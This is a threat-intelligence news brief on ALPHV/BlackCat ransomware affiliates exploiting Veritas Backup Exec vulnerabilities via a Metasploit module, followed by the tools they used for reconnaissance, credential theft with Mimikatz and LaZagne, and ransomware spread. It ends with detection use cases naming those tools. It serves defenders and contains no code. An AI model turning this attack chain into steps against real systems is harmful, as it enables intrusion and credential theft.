ALPHV Ransomware Attackers Exploit Veritas Backup Exec Software as Gateway to Corporate Networks

Category: Ransomware News | Industry: Global | Level: Tactical | Source: Mandiant

Mandiant researchers have identified the ALPHV (aka Blackcat) ransomware-as-a-service (RaaS) as exploiting vulnerable versions of Veritas Backup Exec installations since late 2022, obtaining initial access to corporate networks. The attackers seem to be favoring vulnerabilities in Vertias's SHA Authentication scheme namely exploiting CVE-2021-27876, CVE-2021-27877 and CVE-2021-27878. Mandiant identified "On September 23, 2022, a METASPLOIT module was released which exploits these vulnerabilities and creates a session which the threat actor can use to interact with the victim system."

With the METASPLOIT session available, the attackers proceeded to gather system and network information by performing internal reconnaissance, dropping their tools onto the victim environment, initiate command control, tampering with security configurations like Windows Defender and escalate their privileges. Notable tools leveraged by ALPHV affiliates includes Advanced IP Scanner and ADRecon for reconnaissance, Background Intelligent Transfer Service (BITS) for tool download, Mimikatz and LAZAGNE for credential access. Before deploying the Rust-based ransomware encryptor, the actors added a task to the domain policy to spread the malware. Mandiant notes the ALPHV affiliates' targeting of vulnerable Veritas hosts is concerning, as a "commercial Internet scanning service identified over 8,500 installations of Veritas Backup Exec instances that are currently exposed to the internet, some of which may still be unpatched and vulnerable."

Anvilogic Scenario:

• BITSadmin Abuse for Host Compromise

Anvilogic Use Cases:

• BITSadmin Execution
• Mimikatz Execution
• Known Credential Dumping Tool Execution

‍